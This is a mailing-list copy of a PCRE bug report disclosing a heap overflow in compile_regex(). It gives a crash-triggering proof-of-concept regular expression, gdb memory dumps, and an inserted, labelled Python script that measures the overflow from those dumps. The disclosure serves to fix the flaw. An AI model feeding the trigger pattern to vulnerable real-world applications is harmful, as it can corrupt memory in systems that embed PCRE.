[pcre-dev] [Bug 1672] New: PCRE Library Heap Overflow in com…

Author: admin
Date:  
To: pcre-dev
Subject: [pcre-dev] [Bug 1672] New: PCRE Library Heap Overflow in compile_regex()
https://bugs.exim.org/show_bug.cgi?id=1672

            Bug ID: 1672
           Summary: PCRE Library Heap Overflow in compile_regex()
           Product: PCRE
           Version: 8.37
          Hardware: All
                OS: All
            Status: NEW
          Severity: security
          Priority: medium
         Component: Code
          Assignee: ph10@???
          Reporter: rubymail@???
                CC: pcre-dev@???


I. Summary
PCRE is a regular expression C library inspired by the regular expression
capabilities of the Perl programming language. The PCRE library is incorporated
into a number of prominent programs, such as Adobe Flash, Apache, Nginx and PHP.
The PCRE library is prone to a vulnerability which leads to a heap overflow. During
the compilation of a malformed regular expression, more data is written to the
malloc'ed block than the size estimated beforehand by compile_regex. Exploits using
advanced heap feng shui techniques may allow an attacker to execute arbitrary
code in the context of the user running the affected application.
------------------------------------------------------------------
II. Description
The latest version of PCRE is prone to a heap overflow vulnerability, which can be
triggered by the following regular expression.

/(?J:(?|(:(?|(?'R')(\z(?|(?'R')(\k'R')|((?'R')))k'R')|((?'R')))H'Ak'Rf)|s(?'R')))/

A dry run of this particular regular expression with pcretest reports
"double free or corruption (!prev)", but it is actually a heap overflow problem.
It is a similar problem to the one discussed in
https://bugs.exim.org/show_bug.cgi?id=1667.

The following test was run with the SVN (trunk) version of PCRE.
Here is the memory layout of re (its size is 248 bytes) just before the second
compile_regex():
==============================================================
(gdb) x/256b 0x1f8a8a0
0x1f8a8a0:     [0x45    0x52    0x43    0x50    0xf8    0x00    0x00    0x00
0x1f8a8a8:      0x00    0x00    0x00    0x00    0x00    0x04    0x00    0x00
0x1f8a8b0:      0xff    0xff    0xff    0xff    0xff    0xff    0xff    0xff
0x1f8a8b8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a8c0:      0x00    0x00    0x40    0x00    0x04    0x00    0x05    0x00
0x1f8a8c8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a8d0:      0x50    0xaf    0xf8    0x01    0x00    0x00    0x00    0x00
0x1f8a8d8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a8e0:      0x00    0x02    0x52    0x00    0x00    0x04    0x52    0x00
0x1f8a8e8:      0x00    0x05    0x52    0x00    0x00    0x03    0x52    0x00
0x1f8a8f0:      0x00    0x01    0x52    0x00    0x00    0x00    0x00    0x00
0x1f8a8f8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a900:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a908:      0xc0    0x91    0x34    0xf7    0xff    0x7f    0x00    0x00
0x1f8a910:      0xff    0xff    0xff    0xff    0x00    0x00    0x00    0x00
0x1f8a918:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a920:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a928:      0x80    0xa9    0xf8    0x01    0x00    0x00    0x00    0x00
0x1f8a930:      0xff    0xff    0xff    0xff    0xff    0xff    0xff    0xff
0x1f8a938:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a940:      0x90    0xa9    0xf8    0x01    0x00    0x00    0x00    0x00
0x1f8a948:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a950:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a958:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a960:      0xff    0xff    0xff    0xff    0x00    0x00    0x00    0x00
0x1f8a968:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a970:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a978:      0xa0    0x76    0x34    0xf7    0xff    0x7f    0x00    0x00
0x1f8a980:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a988:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a990:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00]
0x1f8a998:      0x41    0x01    0x00    0x00    0x00    0x00    0x00    0x00
==============================================================


After the second compile_regex():

==============================================================
(gdb) x/192b 0x1f8a8a0
0x1f8a8a0:     [0x45    0x52    0x43    0x50    0xf8    0x00    0x00    0x00
0x1f8a8a8:      0x00    0x00    0x00    0x00    0x00    0x04    0x00    0x00
0x1f8a8b0:      0xff    0xff    0xff    0xff    0xff    0xff    0xff    0xff
0x1f8a8b8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a8c0:      0x00    0x00    0x40    0x00    0x04    0x00    0x05    0x00
0x1f8a8c8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a8d0:      0x50    0xaf    0xf8    0x01    0x00    0x00    0x00    0x00
0x1f8a8d8:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x1f8a8e0:      0x00    0x02    0x52    0x00    0x00    0x04    0x52    0x00
0x1f8a8e8:      0x00    0x05    0x52    0x00    0x00    0x03    0x52    0x00
0x1f8a8f0:      0x00    0x01    0x52    0x00    0x83    0x00    0xa6    0x83
0x1f8a8f8:      0x00    0xa0    0x83    0x00    0x8d    0x81    0x00    0x87
0x1f8a900:      0x85    0x00    0x81    0x00    0x01    0x1d    0x3a    0x83
0x1f8a908:      0x00    0x56    0x85    0x00    0x05    0x00    0x02    0x78
0x1f8a910:      0x00    0x05    0x81    0x00    0x48    0x85    0x00    0x42
0x1f8a918:      0x00    0x03    0x18    0x83    0x00    0x1e    0x85    0x00
0x1f8a920:      0x05    0x00    0x04    0x78    0x00    0x05    0x81    0x00
0x1f8a928:      0x10    0x85    0x00    0x0a    0x00    0x05    0x73    0x00
0x1f8a930:      0x00    0x00    0x05    0x78    0x00    0x0a    0x78    0x00
0x1f8a938:      0x10    0x77    0x00    0x13    0x85    0x00    0x0d    0x00
0x1f8a940:      0x04    0x85    0x00    0x05    0x00    0x05    0x78    0x00
0x1f8a948:      0x05    0x78    0x00    0x0d    0x78    0x00    0x31    0x1d
0x1f8a950:      0x6b    0x1d    0x27    0x1d    0x52    0x1d    0x27    0x78
0x1f8a958:      0x00    0x42    0x78    0x00    0x48    0x77    0x00    0x13
0x1f8a960:      0x85    0x00    0x0d    0x00    0x02    0x85    0x00    0x05
0x1f8a968:      0x00    0x03    0x78    0x00    0x05    0x78    0x00    0x0d
0x1f8a970:      0x78    0x00    0x69    0x1d    0x48    0x1d    0x27    0x1d
0x1f8a978:      0x41    0x1d    0x6b    0x1d    0x27    0x1d    0x52    0x1d
0x1f8a980:      0x66    0x78    0x00    0x81    0x78    0x00    0x87    0x77
0x1f8a988:      0x00    0x0d    0x1d    0x73    0x85    0x00    0x05    0x00
0x1f8a990:      0x01    0x78    0x00    0x05    0x78    0x00    0x9a    0x78]
0x1f8a998:      0x00    0xa0    0x78    0x00    0xa6    0x00    0x00    0x00
==============================================================
At least 5 more bytes are written beyond the end of the 248-byte block.
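To show how the two dumps above establish the overflow, here is an added triage script (not part of the report or of PCRE) that parses gdb `x/Nb` output, reads the 248-byte size out of the compiled pattern header (PCRE 8.x stores its MAGIC_NUMBER 0x50435245 followed by a 32-bit size field), and measures how far past the block the bytes changed between the two dumps. The embedded excerpt is constructed from the first and last two lines of each dump quoted above; the bytes 0x41 0x01 at 0x1f8a998 in the "before" dump are glibc's size field for the next heap chunk, which is why the corruption later surfaces as a malloc error rather than as a crash in compile_regex itself.

```python
import re
from typing import Dict

# Constructed excerpt of the report's two gdb dumps: the header line of the
# compiled pattern plus the last two lines of each dump. The "[" / "]"
# brackets mark the 248-byte allocation exactly as in the report.
BEFORE = """\
0x1f8a8a0:     [0x45    0x52    0x43    0x50    0xf8    0x00    0x00    0x00
0x1f8a990:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00]
0x1f8a998:      0x41    0x01    0x00    0x00    0x00    0x00    0x00    0x00
"""
AFTER = """\
0x1f8a8a0:     [0x45    0x52    0x43    0x50    0xf8    0x00    0x00    0x00
0x1f8a990:      0x01    0x78    0x00    0x05    0x78    0x00    0x9a    0x78]
0x1f8a998:      0x00    0xa0    0x78    0x00    0xa6    0x00    0x00    0x00
"""

PCRE_MAGIC = 0x50435245          # 'PCRE' as PCRE 8.x stores it (little-endian here)
DUMP_LINE = re.compile(r"^(0x[0-9a-f]+):\s*(.*)$")


def parse_gdb_bytes(text: str) -> Dict[int, int]:
    """Turn 'x/Nb ADDR' output into {address: byte}, ignoring the [ ] markers."""
    mem: Dict[int, int] = {}
    for line in text.splitlines():
        m = DUMP_LINE.match(line.strip())
        if not m:
            continue
        base = int(m.group(1), 16)
        for i, v in enumerate(re.findall(r"0x[0-9a-f]{2}", m.group(2))):
            mem[base + i] = int(v, 16)
    return mem


def compiled_block_size(mem: Dict[int, int], base: int) -> int:
    """Read the 32-bit size field that follows the magic in a PCRE 8.x header."""
    u32 = lambda off: int.from_bytes(bytes(mem[base + off + i] for i in range(4)), "little")
    if u32(0) != PCRE_MAGIC:
        raise ValueError("no compiled PCRE pattern at 0x%x" % base)
    return u32(4)                # 0xf8 -> 248 for the block in the report


def overflow_extent(before: Dict[int, int], after: Dict[int, int], base: int, size: int) -> int:
    """Shortest write past base+size that explains every changed byte there.
    Unchanged bytes inside that run (e.g. a written 0x00 over a 0x00) still
    count, which is why the report says 'at least' 5. Returns 0 if untouched."""
    end = base + size
    changed = [a for a in after if a >= end and a in before and before[a] != after[a]]
    return max(changed) - end + 1 if changed else 0


if __name__ == "__main__":
    b, a = parse_gdb_bytes(BEFORE), parse_gdb_bytes(AFTER)
    size = compiled_block_size(b, 0x1f8a8a0)
    print("block size %d, bytes written past it: %d" % (size, overflow_extent(b, a, 0x1f8a8a0, size)))
```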


------------------------------------------------------------------
III. Impact
Heap Overflow
------------------------------------------------------------------
IV. Affected
The latest version of PCRE is confirmed to be vulnerable.
PCRE2 is not affected.
Other applications may also be affected.
------------------------------------------------------------------
V. Credit
Wen Guanxing from Venustech ADLAB is credited for this vulnerability.
